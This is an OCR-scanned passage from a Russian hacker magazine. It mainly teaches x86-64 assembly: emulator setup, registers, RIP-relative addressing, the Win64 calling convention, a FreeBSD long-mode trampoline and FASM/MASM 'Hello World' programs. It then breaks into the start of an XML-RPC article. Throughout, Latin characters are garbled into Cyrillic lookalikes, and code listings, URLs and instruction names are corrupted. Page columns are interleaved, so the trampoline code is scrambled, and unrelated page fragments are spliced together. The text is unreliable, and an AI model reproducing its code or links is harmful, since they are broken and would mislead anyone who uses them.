официальном сайте ( ЫІрУ/ЬосІіз.зоигсеІогде.пеІ У) можно найти несколько 
готовых бинарных сборок под разные платформы, но... только для архи- 
тектуры х86. Эмуляция х86-64 требует обязательной перекомпиляции под 
*піх-системами. Скачиваем исходные тексты (МІрУ/ргсіоѵѵпІоасІз.зоигсе- 
іогде.пеі/ЬосІіз/ЬосІіз-22.1 .іаг.дг?боуѵп!оасІ), распаковываем архив, запус- 
каем конфигуратор с ключом -епаЫе-х86-64 и затем даем таке. 

[сборка ВОСНЗ'а с поддержкой эмуляции х86-64] 

$./сопТідиге -епаЫе-х86-64 
$таке 

Образуется исполняемый файл ЬосИз, требующий для своей работы Ьіоз 
и Ьхгс-сценарий, которые можно позаимствовать из готовой бинарной 
сборки. Для компиляции под ѴѴіпсІоѵѵз-платформу следует запустить 
скрипт сопГѵѵіп32-ѵсрр, а затем выполнить таке ѵѵіп32_зпар. Для этого, 
естественно, необходимо иметь І_іпих, поскольку ѴѴіпсІоѵѵз зііеіі-скриптов 
в упор не понимает (правда, можно воспользоваться Судѵѵіп'ом, но сбор- 
ка под ним — отдельный геморрой). 

[сборка ВОСНЗ'а для компиляции МісгозоІІ ѴіэиаІ С++] 

5Іі .сопіѵѵіп32-ѵсрр 
таке \л/іп32_зпар 




Залезай на диск к журна- 
лу, там ты обнаружишь все 
исходники к статье. 
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64-разрядный лейбл 



64-битная версия 
ѴѴіпсІоѵѵз в стадии на- 
чальной загрузки 



Сборка компилятором 
МісгозоЛ ѴізиаІ С++ 6.0 
проходит не очень глад- 
ко (точнее, не проходит 
совсем) и приходится 
устранять многочислен- 
ные ошибки, допущен- 
ные разработчиками 
эмулятора, что требует 
времени и квалифика- 
ции. Хорошо, что в Сети можно найти множество сборок борща, например: 
Шр://уѵуѵуѵ.рзуоп.огд/ЬосЬз-Уѵіп32/ЬосЬз-х86-64-20050508.ехе. 

Тем не менее, со своей работой борщ справляется из рук вон плохо и 
к тому же сильно тормозит. Мой Репйит-ІІІ 733 затормаживается до < 
1 Мгц АІѴЮ 64, отставая даже от Машины Бэббиджа, собранной на 
шестеренках и приводимой в движение паровым двигателем. Многие 
64-битные Линухи вылетают еще на стадии загрузки ядра. Побало- 
ваться х86-64 режимом под борщом еще можно, но на рабочий инстру- 
мент он не тянет. Впрочем, в последующих версиях ошибки эмуляции 
скорее всего будут исправлены, и тогда единственным недостатком 
останется низкая скорость, а вот это уже фундаментально. Обладате- 
лям Іоѵѵ-епсІ процессоров придется искать что-то еще. 

ОЕМІІ — бесплатный динамический эмулятор, основанный на ВОСНЗ. Ар- 
хитектура х86-64 эмулируются на РепІіит-ІІІ с ничуть не худшей скоростью, 
чем х86 под коммерческим ѴМ ѴѴаге. Стабильность работы также выше 
всяких похвал. На официальном сайте (Шр://іаЬгісе . ЬеІІагсМгее. Іг/дети/) 
выложены исходные тексты и готовые сборки под І_іпих. Обладателям 
ѴѴіпсІоѵѵз приходится заниматься компиляцией самостоятельно или рыс- 
кать в поисках добычи по Сети. Добросовестный билд лежит на хорошем 
японском сервере Шр://м\іт.и7.діоппе]р/~дети-ѵ\/іп/. Там же можно найти 
драйвер-акселератор, ускоряющий эмуляцию в несколько раз. Кстати го- 
воря, помимо х86-64, ОЕМІІ эмулирует х86, 5РАВС, РоѵѵгРС и некоторые 
другие архитектуры. И еще, ОЕМІІ — это единственный эмулятор, в кото- 
ром виртуальная сеть встает сама без плясок с бубном и не загаживает ос- 
новную операционную систему левыми адаптерами. 

Также нам потребуется 64-разрядная операционная система. Дотянутся 
до 64-битных регистров и прочих вкусностей х86-64-архитектуры можно 
только из специального 64-разрядного режима (Іопд тобе). Ни под ре- 
альным, ни под 32-разрядным защищенным х86-режимом они не досту- 
пы. И хотя мы покажем, как перевести процессор из реального в 64-раз- 
рядный режим, создание полнофункциональной операционной системы 
не входит в наши планы, а без нее никуда! 

Проще всего, конечно, взять ѴѴіпсІоѵѵз ХР 64-ВіІ ЕсІШоп, но... не все хакеры 
разделяют это мнение (правильную вещь буквой X не назовут). Если вып- 
рямить земную ось, то поднимется такой цунами, что всю Америку вместе 
с Редмондом смоет на хрен в океан. А Ыпих делают и в континентальной 
Европе, до которой никакие цунами не достанут! (Правда, ей угрожает лед- 
ник и первой пострадают небезразличные для Линуха скандинавские стра- 
ны). Большинство производителей либо уже выпустили х86-64 порты, либо 
собираются это сделать в ближайшем будущем. Приверженцам традицион- 
ного немецкого качества можно порекомендовать ЗиЗЕ І_іѵеСЭ 9.2, не тре- 
бующий установки {Шр://зизе.озиозіогд/зизе/х86_64/Ііѵе-ссі-9.2/ЗіІ8Е- 
ипих-9.2-иѵеСО-64Ьіі.ізо), но лично я больше предпочитаю Дебиан, не- 
официальный порт которого в формате ЬизіпеззсагсІ-СО лежит на 
Шр://ссИтаде . сІеЫап. огд/ссИтаде/ипоНісіаІ/загде-атсІ64/ізо-ссІ/сІеЫап- 
31 г0а-атс!64-ЬизіпеззсагсІ.ізо. Там же можно найти и другие порты. 
Теперь перейдем к подготовке инструментария. Как минимум, нам пона- 
добится ассемблер и отладчик. Мы будем использовать РАЗМ 
(Шр://1ІаіаззетЫег.пеІ/). Он бесплатен, работает под ЫШХ/ѴѴіпсІоѵѵз/МЗ- 
ЭОЗ, поддерживает х86-64, обладает удобным синтаксисом и т. д. Лю- 
бители классической миссионерской могут качнуть бесплатный 
ѴѴіпсІоѵѵз Зегѵег 2003 ЗР1 РІаМогт ЗЭК (Мір://ѵѵѵѵѵѵ.тісго 80 Іі .сот/сіо ѵѵп - 
Іоа6з/6е\аіІз.азрх?ЕатіІу16=А55В6В43-Е24Е-4ЕАЗ-А93Е-40С0ЕС4Е68Е5 ), 
в состав которого входит 64-разрядный МАЗМ. Синтаксически оба этих 
ассемблера несовместимы, так что попеременно пользоваться ими не 
удастся, и нужно сразу выбирать какой-то один. 

Практически во все х86-64 порты Линуха входит ОШ ОеЬиддег, которо- 
го для наших задач вполне достаточно. Обладатели ѴѴіпсІоѵѵз могут вос- 
пользоваться МісгозоЛ ЭеЬиддег'ом, входящим в состав бесплатного 
МісгозоЛ ЭеЬиддіпд Тооіз {Ыір://уѵуѵуѵ.тісгозоіі.сот/уѵМс/сіеѵІооІз/сіеЬид- 
діпд/іпзіаІІатсІЬеіа.тзрх ) . 



[обзор х86-64] За подробным описанием х86-64-архитектуры лучше всего об- 
ратиться к фирменной документации АІѴЮ64 ТесИпоІоду — АІѴЮ64 АгсГійесШге 
Ргодгаттег'з МапиаІ Ѵоіите 1 :АррІісайоп Ргодгаттіпд ( Шр://шт.ат6. сот/из - 
еп/аззеІз/сопіепІ_іуре/уѵіііІе _рарегз_апсІ_ІесІі_сІосз/24593.рсІГ) . Мы же ограни- 
чимся только беглым обзором основных нововведений. 



Наконец-то АІѴЮ сжалилась над нами и подарила программистам то, что 
все так долго ждали. К семи регистрам общего назначения (восьми — с 
учетом ЕЗР) добавилось еще восемь, в результате чего их общее коли- 
чество достигло 15 (16) штук. 

Старые регистры, расширенные до 64-бит, получили имена ВАХ, ВВХ, 
ВСХ, ВЭХ, ВВР, ВЗІ, ВЭІ, ВЗР, ВІР и ВРІ_АѲЗ. Новые регистры оста- 
лись безымянными и просто пронумерованы от В8 до В15. Для обраще- 
ния к младшим 8-, 16- и 32-битам новых регистров можно использовать 
суффиксы Ь, ѵѵ и б. Например, В9 — это 64-разряный регистр, В9Ь — 
его младший байт (по аналогии с АІ_), а В9ѵѵ — младшее слово (то же 
самое, что АХ в ЕАХ). Прямых наследников АН, к сожалению, не наб- 
людается и для манипуляции со средней частью регистров приходится 
извращаться со сдвигами и математическими операциями. 

Регистр, указатель команд ВІР, теперь адресуется точно так же, как и 
все остальные регистры общего назначения. Программисты, заставшие 
живую РЭР-11 (или ее отечественный клон — Электронику БК или 
УКНЦ), только презрительно хмыкнут — наконец-то до разработчиков 
стали доходить очевидные истины, которые на всех нормальных плат- 
формах были реализованы еще неизвестно когда. 

Возьмем простейший пример: загрузим в регистр АІ_ опкод следующей 
машинной команды. На х86 приходится поступать так. 

[загрузка опкода следующей машинной команды в классическом х 86 ] 

саІІ $ + 5 ; запихнуть в стек адрес следующей команды и передать 

; на нее управление 

рор еЬх ; вытолкнуть из стека адрес возврата 

асШ еЬх, 6 ; скорректировать адрес на размер команд рор/асШ/тоѵ 

тоѵ аі, [еЬх]; теперь АІ_ содержит опкод команды І\І0Р 

пор ; команда, чей опкод мы хотим загрузить в АІ_ 

Это же умом поехать можно, пока все это напишешь! И еще здесь 
очень легко ошибиться в размере команд, который приходится вы- 
числять либо вручную, либо загромождать листинг никому не нуж- 
ными метками, к тому же неизбежно затрагивается стек, что в ряде 
случаев нежелательно или недопустимо (особенно в защитных ме- 
ханизмах, нашпигованных антиотлаодчными приемами). 

А теперь перепишем тот же самый пример на х86-64. 

[загрузка опкода следующей машинной команды на х86-64] 

тоѵ аІ,[гір] ; загружаем опкод следующей машинной команды 
пор ; команда, чем опкод мы хотим загрузить в АІ_ 

Красота! Только следует помнить, что ВІР всегда указывает на следую- 
щую, а отнюдь не текущую инструкцию! К сожалению, ни ВІР, ни 
САІ_І_ ВІР не работают. Таких команд в лексиконе х86-64 просто нет. 

Но это еще что! Исчезла абсолютная адресация! Если нам надо из- 
менить содержимое ячейки памяти по конкретному адресу, на х86 
мы поступаем приблизительно так: 

сіес Ьуіе ріг [ 666 І 1 ] ; уменьшить содержимое байта по адресу 6666 

; на единицу 

Под х86-64 транслятор выдает ошибку ассемблирования, вынуждая нас 
прибегать к фиктивному базированию: 

хог г9, г9 ; обнулить регистр г9 

бес Ьуіе ріг [г9+6666] ; уменьшить содержимое байта по адресу 
; 0+6666 на единицу 



Есть и другие отличия от х86, но они не столь принципиальны. Важно то, что 
в режиме совместимости с х86 (І_едасу Мобе) ни 64-битные регистры, ни но- 
вые методы адресации недоступны! Никакими средствами (включая черную 




[хакер 11 [83] 05 > кодинг 119] 







[хакер 11 [83] 05 > КОДИНГ 120 ] 




регистры, доступные в х86-64 режиме 




реакция 32-битной ѴѴіпбоѵѵз на по- 
пытку запуска 64-битного РЕ-файла 



йеЬіаг 



загрузка 64-разрядного Дебиана 
под эмулятором ОЕМІІ 



и белую магию) дотянуться до них 
нельзя и прежде чем что-то сделать, 
необходимо перевести процессор в 
длинный режим (Іопд тобе), который 
делиться на два подрежима: режим 
совместимости с х86 (сотраІіЬіМІу 
тобе) и 64-битный режим (64-ЬіІ 
тобе). Режим совместимости предус- 
мотрен только для того, чтобы 64-раз- 
рядная операционная система могла 
выполнять старые 32-битные прило- 
жения. Никакие 64-битные регистры 
здесь и не ночевали! Реальная 64-бит- 
ность обитает только в 64-Ьіі Іопд 
тобе, о котором мы и будем говорить! 

[НеІІо ѵѵогісі на х86-64] Програм- 
мирование под 64-битную версию 
ѴѴіпсІоѵѵз мало чем отличается от 



традиционного: только все операнды и адреса 
по умолчанию 64-разрядные, а параметры АРІ- 
функций передаются большей частью через 
регистры, а не через стек. Первые четыре аргу- 
мента всех АРІ-функций передаются в регист- 
рах ВСХ, РЮХ, В8 и В9 (регистры перечислены 
в порядке следования аргументов, крайний ле- 
вый аргумент помещается в ВСХ). А уж остальные параметры кладутся 
в стек. Все это называется х86-64 Іазі саіііпд сопѵегзіоп (соглашение о 
быстрой передаче параметров для х86-64), подробное описание которой 
можно найти в статье ТНе Пізіогу оі саіііпд сопѵепйопз, рагі 5 атб64 
(М1р://Ыодз . тзсіп . сот/оісіпе ѵѵІІііпд/агсІііѵе/2004/0 1/1 4/58579. азрх). Т акже 
советую заглянуть на страничку бесплатного компилятора Ргее РА8САІ_ 
и поднять документацию по способам вызова АРІ: Шр://шѵ\/ѵ.ігееразсаІ.огд/ 
ѵѵікі/іпсІех.р1ір/ѴѴіп64/АІ\/Ю64_АРІ. В частности, вызов функции с пятью 
аргументами АРИипс(1 ,2, 3,4, 5) выглядит так: 




64-битный файл — 
первый полет 



тоѵ сіѵѵогсі ріг [гзр+200], 5 

тоѵ г9сІ, 4 

тоѵ г8с1, 3 

тоѵ есіх, 2 

тоѵ есх, 1 

саІІ АРИипс 



; кладем на стек пятый слева аргумент 
; передаем четвертый слева аргумент 
; передаем третий слева аргумент 
; передаем второй слева аргумент 
; передаем первый слева аргумент 



Смещение пятого аргумента относительно верхушки стека требует пояс- 
нений. Почему оно равно 20Гі? Ведь адрес возврата занимает только 8 
байт. Какая су... сущность съела все остальные? Оказывается, они резер- 
вируются для первых четырех аргументов, переданных через регистры. 
Зарезервированные ячейки содержат неинициализированный мусор и по- 
буржуйски называются зріІІ, что переводится как затычка или потеря. 

Вот минимум знаний, необходимых для выживания в мире 64-битной 
ѴѴіпсІоѵѵз при программировании на ассемблере. Остается разобрать 
самую малость: как эти самые 64-бита заполучить?! Для перевода 
РАЗМ'а в х86-64 режим достаточно указать директиву изе64 и даль- 
ше кодить как обычно. 

Ниже идет пример простейшей х86-64 программы, которая не делает 
ничего, только возвращает в регистре ВАХ значение 0. 



ПЕРЕХОД В 64-РАЗРЯДНЫЙ РЕЖИМ 


#бе!іпе ѴРВА8Е ОхаООО 


Г Ве сиге Фаі іпТеггирТз аге бізаЫеб 7 


Как известно, в исходниках РгееВЗО 


#бе!іпе ѴТОР(х) ((х) + ѴРВАЗЕ) 


СІІ 




можно найти файл атсІ64_{гатр.З, 


.баіа 




Г Тит оп ЕРЕВ1МЕ 7 


быстро и грязно переводящий 






тоѵі 


$М8Р_ЕРЕВ, %есх 


процессор в 64-режим. Откомпили- 


.р2аІідп 12,0x40 




гбтзг 




ровав, его можно записать в Ьооі- 






ОГІ 


$ЕРЕР_ЕМЕ, %еах 


сектор, загружающий нашу 


.дІоЫ РТ4 




ѵѵгтзг 




собственную операционную систему 


РТ4: 








(ты ведь пишешь ее, правда?), 


.зрасе 


0x1000 


/* Тит оп РАЕ 7 


или слинковать сот-файл, запускае- 


.дІоЫ РТЗ 




тоѵі 


%сг4, %еах 


мый из реального х86-режима (для 


РТЗ: 




ОГІ 


$(СР4_РАЕ 1 СР4.РЗЕ), %еах 


этого потребуется чистая МЗ-йОЗ 


.зрасе 0x1000 




тоѵі 


%еах, %сг4 


безо всяких экстендеров). В общем, 


.дІоЫ РТ2 








вариантов, как с этим справиться, 


РТ2: 




/* 8еі 


%сгЗ Тог РТ4 7 


довольно много. 


.зрасе 


0x1000 


тоѵі 


$ѴТ0Р(РТ4), %еах 








тоѵі 


%еах, %сгЗ 


[перевод процессора в 64-разрядный режим] 


дбібезс: 










.ѵѵогб дбіепб - дбі 




Г Тит оп радіпд (ітрІісіТІу зеТз ЕРЕВ1МА) 7 


//$РгееВ30: /геротап/г/псѵз/$гс/зу$/ЬооѴі386/ 


.Іопд ѴТОР(дсІТ) 


# Іоѵѵ 


тоѵі 


%сг0, %еах 


ІіЫ386/атб64_Ігатр.8,ѵ 1.4 2004/05/14 


.Іопд 0 


# ИідН 


ОГІ 


$СР0_Р6, %еах 








тоѵі 


%еах, %сг0 


/* 


дсІТ: 








* Оиіск апб бігіу Ігатроііпе Іо деі іпіо 64 ЫІ 


.Іопд 0 


# пиІІ безегірфг 


тоѵі 


$ѴТ0Р(дбІбезс), %еах 


(Іопд) тобе апб гиппіпд 


.Іопд 0 




тоѵі 


ѴТОР(епТгу_Іті), %езі 


* ѵѵіФ радіпд епаЫеб зо Фаі ѵѵе епіег Фе кег- 


.Іопд 0x00000000 


# %сз 


тоѵі 


ѴТОР(епТгу_Іо), %ебі 


пеі аі ііз Ііпкеб аббгезз. 


.Іопд 0x00209800 




ІдсИ 


(%еах) 


7 


.Іопд 0x00000000 


# %бз 


Утр 


$0x8, $ѴТОР(Іопдтобе) 


#бе!іпе МЗВ_ЕРЕВ 0хс0000080 


.Іопд 0x00008000 








#бе!іпе ЕРЕРЦ.МЕ 0x00000100 


дбіепб: 






.собе64 


#бе!іпе СР\4_РАЕ 0x00000020 






Іопдтобе: 


#бе!іпе СР\4_Р5Е 0x00000010 


.Тех! 




тоѵі 


%езі, %еах 


#бе!іпе СР0_Р6 0x80000000 


.собе32 




заіб 


$32, %гах 








ОГб 


%гбі, %гах 


Г 6РРР. йеаі ѵѵіФ ВТХ ФаІ Ііпкз из Тог а поп- 


.дІоЫ атб64_1гатр 




ризРб 


%гах 


іего ІосаТіоп 7 


атб64_1гатр: 




геТ 












; сообщаем РАЗМ'у, что мы хотим программировать нах86-64 

и$е64 

хог г9,г9 ; обнуляем регистр г9 

тоѵ гах,г9 ; пересылаем в гах,г9 (можно сразу тоѵ гах,0, но неинтересно) 
геі ; выходим туда, откуда пришли 

Никаких дополнительных аргументов командной строки указывать не надо, 
просто сказать Іазгті Іііе-пате.азт — и все! Через мгновение образуется файл 
ІіІе-пате.Ьіп, который в Гіех-представлении выглядит следующим образом: 

[дизассемблерный листинг простейшей 64-битной программы] 

4й 31 09 хог г9, г9 
40 89 С8 тоѵ гах, г9 
СЗ геіп 



Формально это типичный сот-файл, вот только запустить его не удаст- 
ся (во всяком случае ни одна популярная ось его не съест) и необходи- 
мо замутить законченный ЕІ_Р или РЕ, в заголовке которого будет явно 
прописана нужная разрядность. 

Начиная с версии 1.64, ассемблер РА5М поддерживает специальную 
директиву Іогтаі РЕ64, автоматически формирующую 64-разрядный 
РЕ-файл (директиву изе64 в этом случае указывать уже не нужно), а в 
каталоге ЕХАМРІ_ЕЗ можно найти готовый пример РЕ64ЭЕМО, в кото- 
ром показано, как ее использовать на практике. 

Ниже приведен пример х86-64 программы НеІІо, ѵѵогісі с комментариями: 
[64-битное приложение беііо, ѵѵогісі под ѴѴіпбоѵѵз на РАЗМ'е] 

; пример 64-битного РЕ файла 

; для его выполнения необходимо иметь ѴѴіпсІоѵѵз ХР 64-ЬіІ ебШоп 

; указываем формат 
Іогтаі РЕ64 61Л 

; указываем точку входа 
епігу зіагі 

; создать кодовую секцию с атрибутами на чтение и исполнение 

зесііоп '.собе' собе геабаЫе ехесіЛаЫе 

зіагі: 

тоѵ г9б,0 ; иТуре == МВ_0К (кнопка по умолчанию) 

; аргументы по соглашению х86-64 
; передаются через регистры, не через стек! 

; префикс б задает регистр размером в слово, 

; можно использовать и тоѵ г9,0, но тогда 
; машинный код будет на байт длиннее 

Іеаг8,[_сарбоп] ; ІрСарбоп передаем смещение 

; команда Іеа занимает всего 7 байт, 

; а тоѵ гед, оіізеі — целых 1 1 , так что 
; Іеа намного более предпочтительна 
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специальная сборка ВОСНЗ'а успешно переходит в х86-64 режим, 
уверенно чувствуя себя под виртуальной машиной ѴМ ѴѴаге. Это уже 
двойная эмуляция получается! 



]«Л. ИДО] ТКЙ -44 .М 
«. * *н**4іші гц 





[хакер 11 [83] 05 > КОДИНГ 122 ] 



Іеа гсІх,[_теззаде] ; ІрТехІ передаем смещение выводимой строки 

тоѵ гсх,0 ; ІіѴѴпб передам дескриптор окна владельца 

; (можно также использовать хог гсх, гсх, 

; что на три байта короче) 

саІІ [МеззадеВох] ; вызываем функцию МеззадеВох 

тоѵ есх,еах ; заносим в есх результат возврата 

; (Функция ЕхіІРгосезз ожидает 32-битный параметр 
; можно использовать и тоѵ гсх, гах, но это будет 
; на байт длиннее) 

саІІ [ЕхіІРгосезз] ; вызываем функцию ЕхіІРгосезз 



; создать секцию данных с атрибутами на чтение и запись 
; (вообще-то в данном случае атрибут на запись необязателен, 
; поскольку мы ничего не пишем, а только читаем) 
зесііоп '.баІа' баіа геабаЫе ѵѵгіІеаЫе 



цизассемблирование 64-битного РЕ-файла 32-битной версий ЮА Рго 




_сарІіоп 6Ь 'РЕЫІІМВВА із аѵѵезоте! ',0; АЗСІІ2-строка заголовка окна 
_теззаде 6Ь 'НеІІо ѴѴогІб! ',0 ;АЗСІІ2-строка выводимая на экран 

; создать секцию импорта с атрибутами на чтение и запись 
; (здесь атрибут на запись обязателен, поскольку при загрузке РЕ-Файла 
; в секцию импорта ; будут записываться фактические адреса АРІ-функций) 
зесбоп ’.ібаіа' ітроіі баіа геабаЫе ѵѵгіІеаЫе 

бб 0,0,0, РѴА кегпеІ_пате,ВѴА кегпеИаЫе 
бб 0,0,0, РѴА изег_пате,ВѴА изегИаЫе 

бб 0, 0, 0, 0, 0 ; завершаем список двумя 64-разряными нулеми!!! 



кегпеИаЫе: 

ЕхіІРгосезз бц РѴА _ЕхіІРгосезз 

бц 0 ; завершаем список 64-разряным нулем!!! 

изегИаЫе: 

МеззадеВох бц РѴА _МеззадеВохА 
бд О 



64-разрядным кодом без необходимости. Его следует использовать 
только там, где 64-битная арифметика и 8 дополнительных регистров 
действительно дают ощутимый выигрыш. Например, в математических 
задачах или программах для вскрытия паролей. 



[дизассемблерный листинг 32-битного приложения беііо, ѵѵогІб!] 



собе:00401 000 6А 00 
собе:00401 002 68 00 20 40 00 
собе:00401 007 68 17 20 40 00 
собе:0040100С 6А 00 
собе:0040100Е ЕР 15 44 30 40 00 
собе:00401 01 4 6А 00 
собе:00401 01 6 ЕР 15 ЗС 30 40 00 



ризбО 

ризбоіізеі аРЕЫІІМВРА 
ризбоіізеі аНеІІоѴѴогІб 
ризбО 

саІІ бзіМеззадеВохА 
ризбО 

саІІ бзіЕхіІРгосезз 



В качестве заключительного упражнения перепишем наше приложение 
в стиле МА5М, поклонников которого нужно не бить, а уважать. Никаких 
радикальных отличий не наблюдается: 

[64-битное приложение беііо, ѵѵогІб под ѴѴіпбоѵѵз на МАЗМ'е] 



кегпеЦіате 6Ь 'КЕРІ\ІЕІ_32.0и_',0 
изег_пате 6Ь '113ЕР32.0и_',0 

_ЕхіІРгосезз бѵѵ 0 
6Ь ’ЕхіІРгосезз'.О 
_МеззадеВохА бѵѵ 0 
6Ь 'МеззадеВохА',0 

Ассемблируем файл (Іазт РЕ640ЕМО.АЗМ) и запустим образовавшийся ЕХЕ 
на выполнение. Под 32-разрядной ѴѴіпбоѵѵз он, естественно, не запустится. 
Вдоволь наигравшись нашем первым х86-64 файлом, загрузим его 
в дизассемблер (например, в ЮА Рго 4.7. Она хоть и материться, 
предлагая использовать специальную 64-битную версию, но при на- 
жатии на уез все корректно дизассемблирует, во всяком случае до 
тех пор, пока не столкнется с подлинным 64-битным адресом или 
операндом, с которым произойдет обрезание, в частности, тоѵ 
г9,1234567890Гі дизассемблируется, как тоѵ г9, 34567890Н, так что 
переход на 64-битную версию ЮА все же очень желателен, тем бо- 
лее, что, начиная с ЮА 4.9, она входит в базовую поставку). Пос- 
мотрим, что у нашей программы внутри? 

[дизассемблерный листинг 64-битного приложения беііо, ѵѵогІб!] 

.собе:0000000000401 000 41 В9 00 00 00 00 тоѵ г9б, 0 
.собе:0000000000401 006 40 8й 05 ЕЗ 0Е 00 00 Іеа г8, аРЕІ\ШМВРА 
.собе:0000000000401 000 48 8й 15 03 10 00 00 Іеа гбх, аНеІІоѴѴогІб ; 
"НеІІо ѴѴогІб!" 

.собе:0000000000401 01 4 48 С7 С1 00 00 00 00 тоѵ гсх, 0 
.собе:0000000000401 01 В ЕЕ 1 5 2В 20 00 00 саІІ сзіМеззадеВохА 
.собе:0000000000401 021 89 01 тоѵ есх, еах 

.собе:0000000000401 023 ЕЕ 15 13 20 00 00 саІІ сзіЕхіІРгосезз 

Что ж, довольно громоздко, объемно и концептуально. Для сравнения, 
дизассемблированный листинг аналогичного 32-разрядного файла при- 
веден ниже. Старый х86 код в 1 ,6 раз короче! А ведь это только демон- 
страционная программа из нескольких строк! На полновесных приложе- 
ниях разрыв будет только нарастать! Так что не стоит злоупотреблять 



; объявляем внешние АРІ-функции, которые мы будем вызывать 
ехігп МеззадеВохА: РЕЮС 
ехігп ЕхіІРгосезз: РЕЮС 

; секция данных с атрибутами по умолчанию (чтение и запись) 

.баіа 

туМ 6Ь 'РЕІМІІМВЕІА із аѵѵезоте!', 0 
тутзд 6Ь 'НеІІо ѴѴогІб!', 0 

; секция кода с атрибутами по умолчанию (чтение и исполнение) 

.собе 

Маіп: 

тоѵ г9б, 0 ; иТуре = МВ_0К 

Іеа г8, туМ ; І_РСЗТЕ{ ІрСарбоп 
Іеа гбх, тутзд ; І_РСЗТЕІ ІрТехІ 
тоѵ гсх, 0 ; ИѴѴпб = НѴѴШИЗЕЗКТОР 

саІІ МеззадеВохА 

тоѵ есх, еах ; иЕхіЮобе = МеззадеВох(...) 
саІІ ЕхіІіРгосезз 
Епб Маіп 

Ассемблирование и линковка проходит так: 

тІ64 ХХХ.азт /Ііпк /зиЬзузІегтшіпбоѵѵз /беТаиШіЬ:кегпеІ32.МЬ /беіаиіі- 
МЬ:изег32.МЬ /епІгу:таіп 

в результате чего образуется готовый к употреблению ехе-файл с румяной 
поджаренной корочкой нашего ЦП (РА5М ассемблирует намного быстрее). 
Как показывает практика, запросы типа х86-64 [АІѴГО64] аззетЫег ехатріе 
неэффективны и гораздо лучше использовать что-нибудь вроде тоѵ гах. 

[заключение] Вот мы и познакомились с архитектурой х86-64! Здесь 
действительно есть место, где развернутся и чему поучиться! Насколь- 
ко эти знания окажутся востребованы на практике — так сразу и не ска- 
жешь. У АІѴЮ есть хорошие шансы пошатнуть рынок, но ведь и Іпіеі не 
дремлет, активно продвигая собственные 64-разрядные платформы, из- 
вестные под общем именем ІА64, но о них как-нибудь в другой раз © 
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Смотри! Высокое разрешение! 



На ВѴ О -приложении; в им Дизель, колы Фе а ре 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РЕНРШМ НЬЮСЫ 
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Самопальный 

сервис 

ВСЕ В ПОСЛЕДНЕЕ ВРЕМЯ ПОМЕШАЛИСЬ НА 
ѴѴЕВ-СЕРВИСАХ. ВСЕ БОЛЬШЕ ЛЮДЕЙ 
ЧИТАЮТ НОВОСТИ И ФОРУМЫ ЧЕРЕЗ ВЗЗ, 
ПОИСКОВИК ООООЬЕ ПОЗВОЛЯЕТ 
ОСУЩЕСТВЛЯТЬ ЗАПРОСЫ ЧЕРЕЗ 
АВТОМАТИЧЕСКИЕ НТТР-ИНТЕРФЕЙСЫ, 
ИНТЕРНЕТ-ПЛАТЕЖИ МОЖНО ТАКЖЕ 
ЭЛЕМЕНТАРНЫМ ОБРАЗОМ ПРОЦЕССИТЬ 
ЧЕРЕЗ ѴѴЕВ-ГЕЙТЫ. ПРИШЛО ВРЕМЯ 
РАЗОБРАТЬСЯ С ТЕМ, КАК ВСЕ ЭТО РАБОТАЕТ 
И КАКИМ ОБРАЗОМ МОЖНО ОРГАНИЗОВАТЬ 
СОБСТВЕННЫЙ СЕРВИС. Я РАССКАЖУ ТЕБЕ О 
ПРОСТОМ, СТАНДАРТИЗОВАННОМ И, ДОЛЖНО 
БЫТЬ, САМОМ ПОПУЛЯРНОМ СПОСОБЕ — ОБ 
ХМЬВРС I еіо'о 



Создание ѵѵеЬ-сервисов 
с использованием 
ХМЬВРС 

[какие еще сервисы?] Вообще говоря, ре- 
зонный вопрос :). В самом деле, какие еще сер- 
висы, о чем я? С появлением Интернета люди 
стали создавать массу разнообразных продук- 
тов: кто-то написал первый форум, кто-то на- 
колбасил сложную распределенную вычисли- 



тельную систему для обсчета ка- 
кого-нибудь научного опыта, кто- 
то решил сделать поисковый 
центр, кто-то — организовать пла- 
тежную систему и так далее. У 
всех таких систем всегда есть, как 
минимум, две взаимодействую- 
щие части: сервер и клиент. Само 
собой, им для этого нужно как-то 
общаться. Ну, скажем, вот твой 
браузер, когда ты читаешь форум 
на хакер. ги, взаимодействует с 
ѵѵеЬ-сервером при помощи прото- 
кола ППр; твой ѵѵт-кеарег работа- 
ет с платежным центром ѴѴМ при 
помощи какого-то другого прик- 
ладного протокола. Казалось, все 
просто супер, но на практике не 
совсем так. 

Порой, расплывчатость описаний 
определенных стандартов или их 
нечеткая реализация, приводила 
к несовместимости отдельных 
систем. Кроме того, ребром вста- 
ла проблема взаимодействия 
между удаленными системами, 
работающими под различными 
платформами. Каким образом 
удобнее всего осуществить об- 
мен информацией между, ска- 
жем, какой-то программой, напи- 
санной для ѴѴіпсІоѵѵз, и некото- 
рым сді-приложением под ІІпіх? 
Масса людей нашла ответ на 
этот вопрос в создании собствен- 
ных, порой, нелепых «протоко- 
лов». Но вот фигня — все они бы- 
ли разными и абсолютно несов- 
местимыми друг с другом. Это было 
раз какое-то новое решение — это 




Статья ХМІ-РРС уз 80АР: 
ШрУ/шеЫод.тазикоті.огд/ 
тШпдз/хтІ- 
грс_ѵз_зоар.іііт 
Использование 80АР в РНР5: 
ШрУ/\мш2епб.сот/ріір5/аііі- 
с!ез/ріір5-80АР.ріір 
ХМІ.ЯРС-ЕРІ: іііфУ/хтІгрс- 
ері.зоигсеіогде.пеі 
Разе 4 ХМІ-РРС: 
и/и/и/. Іазе4.сот/хтІгрс 
ріірРРС: іііірУ/зоигсе- 
1 огде.пеі/ргоіесіз/рііргрс 
ріірхтігрс: ШрУ/рбрхтІ- 
грс.зоигсеіогде.пеі 
ХМІ-РРС Кейта Девинса: 
ѵѵѵѵѵѵ.кеіііібеѵепз.сот/зок- 
тге/хтігрс 

Спецификация 80АР весит 
в 10 раз больше, чем до- 
кумент с описание ХМІ- 
РРС. Новая технология 
значительно сложнее и 
функциональнее. За ней 
будущее, но переход мож- 
но осуществить плавно и 
безболезненно. 

На нашем диске ты най- 
дешь всю необходимую 
документацию, пример 
ХМІ-РРС системы из 
статьи, а также все воз- 
можные реализации это- 
го протокола для всех 
языков. 



неудобно, да и городить каждый 
маразм. Поэтому программисты 
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решили разработать единый стандарт, основанный на использовании 
ХМІ_-представления запросов и ответов, который получил название 
ХМІ_-ВРС. ВРС здесь расшифровывается так: Ветоіе Ргосесіиге СаІІ 
(Удаленный Вызов Процедур). Чтобы было понятнее, о чем я говорю, 
расскажу, какого рода сервисы и системы можно создавать при помо- 
щи этой технологии. 

